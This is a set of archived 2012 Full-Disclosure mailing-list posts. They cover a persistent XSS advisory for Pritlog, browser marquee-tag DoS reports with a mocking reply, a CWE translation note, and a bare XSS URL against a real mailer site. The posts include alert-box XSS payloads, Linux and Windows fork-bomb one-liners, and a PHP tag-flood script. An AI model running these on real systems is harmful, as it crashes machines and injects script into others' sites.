[Full-disclosure] Pritlog v0.821 CMS - Multiple Web Vulnerabilities
Title: == Pritlog v0.821 CMS - Multiple Web Vulnerabilities Date: = 2012-04-29 References: === http://www.vulnerability-lab.com/get_content.php?id=534 VL-ID: = 534 Introduction: = PRITLOG is an extremely simple, small ( 500K uncompressed) and powerful blog system. It does not use or need a MYSQL database and fully works based on Sqlite. Sqlite is very similar to flat files and does not need any server setup and comes as default with most PHP5 installations. Just drop Pritlog into your server and it starts running. No separate installation is required. Feature(s): * WYSIWYG editor - nicEdit * Admin interface (change site properties, add authors, change password)\\\'\\\'\\\' * Easy translation. Language selection available in the admin panel. Language files must be created. * Sticky Posts * Integrated login system with registration * Pretty Urls * SEO Optimization * Page functionality for static pages * Social Bookmarking widget: to enable easy sharing of post/blog * Bbcode by editing html (work around) * RSS Feeds * Additional authors can be added by the admin * Post Options w/ Teaser + Full Story (using *readmore* in the post) * Ability to enable / disable comments per post * Global privacy option * Ajax and jQuery for better user experience * Post auto-save feature * Category cloud * Theme engine for easy theme creation * Plugins to easily add functionality (Copy of the Vendor Homepage: http://pritlog.com/fossil.cgi/taglist ) Abstract: = The Vulnerability Laboratory Research Team discovered multiple Web Vulnerabilities in Pritlog v0.821 Content Management System. Report-Timeline: 2012-04-29: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Medium Details: Multiple persistent input validation vulnerabilities are detected in the Pritlog v0.821 Content Management System. The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent). Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent) context manipulation. Exploitation requires low user inter action. Attackers can inject malicious strings as author name to execute them when an admin is processing to preview, review or manage the listing of users. The bug is located on application side the execution is persistent out of the user management web application context. Vulnerable Module(s): [+] Manage User Listing - Username Author Picture(s): ../1.png ../2.png Proof of Concept: = The vulnerability can be exploited by remote attackers with low required user inter action. For demonstration or reproduce .. URL: http://127.0.0.1:1337/pritlog/index.php/adminPageAuthors fieldset legendManage Authors/legend table tbodytrtdstrongAuthor: /strongiframe src=a onload='alert(vl)' br=br/td tdlabel for=authorEmailEmail/labelbr input type=text name=authorEmail id=authorEmail value=f...@aol.com/td/tr Risk: = The security risk of the persistent input validation vulnerability is estimated as medium. Credits: Vulnerability Laboratory [Research Team] -Chokri Ben Achor (meis...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012 Vulnerability-Lab -- VULNERABILITY RESEARCH LABORATORY TEAM Website: www.vulnerability-lab.com Mail: resea...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] DoS vulnerabilities in Firefox, Internet Explorer and Opera
Hello list! I want to warn you about Denial of Service vulnerability in Mozilla Firefox, Internet Explorer and Opera. Earlier there was published DoS vulnerability in browser Opera 10.10 found by Inj3ct0r (http://securityvulns.com/news/Opera/1002.html). And some time ago I've checked this exploit and found that many other browsers are vulnerable to this attack. These are Denial of Service vulnerabilities in Mozilla Firefox, Microsoft Internet Explorer and Opera. They belong to type (http://websecurity.com.ua/2550/) crashing DoS, blocking DoS and resources consumption DoS. The exploit from Inj3ct0r is similar to the exploits, which I've made for Google Chrome (for my project Day of bugs in Google Chrome) and Mozilla Firefox in 2008. Attack in my exploits was conducting via large amount of nested marquee tags, and in his case the html, marquee and h1 tags were used. But the essence is the same - large amount of nested tags (particularly marquee). That time I've informed Google and Mozilla and placed Bug 454434 (https://bugzilla.mozilla.org/show_bug.cgi?id=454434) in Bugzilla, but if Google had fixed the hole, Mozilla hadn't fixed this vulnerability. - Affected products: - Vulnerable are Mozilla Firefox 3.0.19, 3.5.11, 3.6.8, 4.0 beta 2, 11.0, Internet Explorer 6 (6.0.2900.2180), Internet Explorer 7 (7.00.5730.13), Internet Explorer 8 (8.00.6001.18702) and Opera 10.62, and previous versions of these browsers also must be vulnerable. Other browsers can be vulnerable as well. -- Details: -- DoS (WASC-10): This is my version of the exploit for different browsers. http://websecurity.com.ua/uploads/2012/Firefox,%20IE%20%20Opera%20DoS%20Exploit.html This exploit uses JS, but attack can be conducted and without JS - as it shown in my 2008's exploit (http://websecurity.com.ua/uploads/2008/Firefox%203%20DoS%20Exploit.html). This exploit works in the following way: * Mozilla Firefox 3.0.19 consumes resources (50% CPU and a lot of RAM) and crashes. * Mozilla Firefox 3.5.11 consumes resources (50% CPU and a lot of RAM) and crashes. * Mozilla Firefox 3.6.8 consumes resources (50% CPU and a lot of RAM) and crashes. * Mozilla Firefox 4.0 beta 2 freezes and consumes resources (50% CPU and a lot of RAM). * Mozilla Firefox 11.0 freezes and consumes resources (50% CPU and a lot of RAM). * Internet Explorer 6 freezes and consumes resources (50% CPU and a lot of RAM). * Internet Explorer 7 freezes and consumes resources (50% CPU and a lot of RAM). * Internet Explorer 8 only consumes resources (50% CPU and a lot of RAM). I.e. in IE8 the problem was partly fixed by Microsoft. * Opera 10.62 freezes and consumes resources (50% CPU and a lot of RAM). * The exploit doesn't work in browser Google Chrome already since version 1.0.154.48. Google fixed vulnerability with marquee tag after my informing in 2008. Timeline: 2012.04.23 - disclosed at my site (http://websecurity.com.ua/5808/). 2012.04.24 - reminded Mozilla that they still hadn't fixed 2008's hole. Best wishes regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] DoS vulnerabilities in Firefox, Internet Explorer and Opera
On Mon, 30 Apr 2012 15:37:08 +0300, MustLive said: * Mozilla Firefox 3.0.19 consumes resources (50% CPU and a lot of RAM) and crashes. * Mozilla Firefox 3.5.11 consumes resources (50% CPU and a lot of RAM) and crashes. * Mozilla Firefox 3.6.8 consumes resources (50% CPU and a lot of RAM) and crashes. * Mozilla Firefox 4.0 beta 2 freezes and consumes resources (50% CPU and a lot of RAM). * Mozilla Firefox 11.0 freezes and consumes resources (50% CPU and a lot of RAM). * Internet Explorer 6 freezes and consumes resources (50% CPU and a lot of RAM). * Internet Explorer 7 freezes and consumes resources (50% CPU and a lot of RAM). * Internet Explorer 8 only consumes resources (50% CPU and a lot of RAM). I.e. in IE8 the problem was partly fixed by Microsoft. * Opera 10.62 freezes and consumes resources (50% CPU and a lot of RAM). Anybody want to guess how many cores are on his test box? :) pgpUhWZRZilnh.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CWEs translation
Hi list, I finished the translation into french of all available CWEs (Titles + Descriptions). We use it for our CERT. I should soon share this work with french CERTs, but I would like to know if others could provide a translation in other languages? (I know some spain guys are working on it) Thanks My 5 euro cents -- Jerome Athias - NETpeas VP, Director of Software Engineer Palo Alto - Paris - Casablanca www.netpeas.com - The computer security is an art form. It's the ultimate martial art. smime.p7s Description: Signature cryptographique S/MIME ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] XSS in UMP-Sarkozy mailer system
tk3.rylyo.com/14/usb.htm?p=cfmel=jer...@netpeas.comadm=scriptalert('p0wned');/scriptl=fr
smime.p7s
Description: Signature cryptographique S/MIME
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] DoS vulnerabilities in Firefox, Internet Explorer and Opera
Hello list!
I also want to warn you about Denial of Service vulnerability, in almost
every Operating System there is, by e.g., opening a lot of programs at the
same time, or by using Fork bombs such as this in the Linux console: :(){
:|: };: (Reference: http://en.wikipedia.org/wiki/Fork_bomb ), in Windows
this bug can be: %0|%0 and in browsers, creating a HTML file that writes a
million marquee tags will also make the browser freeze in most cases with
current computing technology.
Proof of Concept:
?php
// Secret Leaked MustLive DoS script
$i = 0;
$count = 100;
$omg = marqueeHello list! I want to warn you about
vulnerability!/marquee;
while ($i = $count):
echo $omg; // -- Send this to FD soon and say it's a bug I discovered a
couple of years ago to make it look even more cool along with 5 links to my
website so it can receive more backlinks and a higher page rank hopefully.
$i++;
endwhile;
?
While this bug can't be fixed, it will always be a problem (in the future
it will just be larger scales), but as I just stated, it can't be fixed. It
is the same as trying to run Crysis on a Commodore64, it may be possible,
but your machine will respond as if it is experiencing a Denial of Service
attack, if it doesn't report an error such as Insufficient memory or Out
of memory and crashes instead.
To make up for the MustLive linkspam and this reply, here's a few
unrelated links that may interest you:
http://www.wired.com/threatlevel/2012/04/ruggedcom-backdoor/
http://blog.spiderlabs.com/2012/04/pwning-a-spammers-keylogger.html
http://group-ib.com/images/media/Group-IB_Report_2011_ENG.pdf (State and
Trends of the Russian Digital Crime Market)
http://dualcoremusic.com/nerdcore/upload/dual_core-control.mp3 (Dual Core
- Control, it's a song for The Social Engineer Podcast and Chris Hadnagy of
course.)
http://abcnews.go.com/Technology/wireStory/report-iran-unplugs-oil-facilities-internet-16194653#.T58cOcXSoV0
Note that I have absolutely no relation to any of the websites above.
Best regards,
Nemesis 3.0
On Mon, 30 Apr 2012 15:37:08 +0300, MustLive
mustl...@websecurity.com.ua wrote:
Hello list!
I want to warn you about Denial of Service vulnerability in Mozilla
Firefox, Internet Explorer and Opera. Earlier there was published DoS
vulnerability in browser Opera 10.10 found by Inj3ct0r
(http://securityvulns.com/news/Opera/1002.html). And some time ago I've
checked this exploit and found that many other browsers are vulnerable
to
this attack.
These are Denial of Service vulnerabilities in Mozilla Firefox,
Microsoft
Internet Explorer and Opera. They belong to type
(http://websecurity.com.ua/2550/) crashing DoS, blocking DoS and
resources
consumption DoS.
The exploit from Inj3ct0r is similar to the exploits, which I've made
for
Google Chrome (for my project Day of bugs in Google Chrome) and
Mozilla
Firefox in 2008. Attack in my exploits was conducting via large amount
of
nested marquee tags, and in his case the html, marquee and h1 tags were
used. But the essence is the same - large amount of nested tags
(particularly marquee). That time I've informed Google and Mozilla and
placed Bug 454434 (https://bugzilla.mozilla.org/show_bug.cgi?id=454434)
in
Bugzilla, but if Google had fixed the hole, Mozilla hadn't fixed this
vulnerability.
-
Affected products:
-
Vulnerable are Mozilla Firefox 3.0.19, 3.5.11, 3.6.8, 4.0 beta 2, 11.0,
Internet Explorer 6 (6.0.2900.2180), Internet Explorer 7 (7.00.5730.13),
Internet Explorer 8 (8.00.6001.18702) and Opera 10.62, and previous
versions of these browsers also must be vulnerable. Other browsers can
be
vulnerable as well.
--
Details:
--
DoS (WASC-10):
This is my version of the exploit for different browsers.
http://websecurity.com.ua/uploads/2012/Firefox,%20IE%20%20Opera%20DoS%20Exploit.html
This exploit uses JS, but attack can be conducted and without JS - as it
shown in my 2008's exploit
(http://websecurity.com.ua/uploads/2008/Firefox%203%20DoS%20Exploit.html).
This exploit works in the following way:
* Mozilla Firefox 3.0.19 consumes resources (50% CPU and a lot of RAM)
and
crashes.
* Mozilla Firefox 3.5.11 consumes resources (50% CPU and a lot of RAM)
and
crashes.
* Mozilla Firefox 3.6.8 consumes resources (50% CPU and a lot of RAM)
and
crashes.
* Mozilla Firefox 4.0 beta 2 freezes and consumes resources (50% CPU and
a
lot of RAM).
* Mozilla Firefox 11.0 freezes and consumes resources (50% CPU and a lot
of RAM).
* Internet Explorer 6 freezes and consumes resources (50% CPU and a lot
of
RAM).
* Internet Explorer 7 freezes and consumes resources (50% CPU and a lot
of
RAM).
* Internet Explorer 8 only consumes resources (50% CPU and a lot of
RAM).
I.e. in IE8 the problem was partly fixed by Microsoft.
* Opera 10.62 freezes and consumes resources (50% CPU and a lot of RAM).
* The exploit doesn't work in browser Google Chrome already
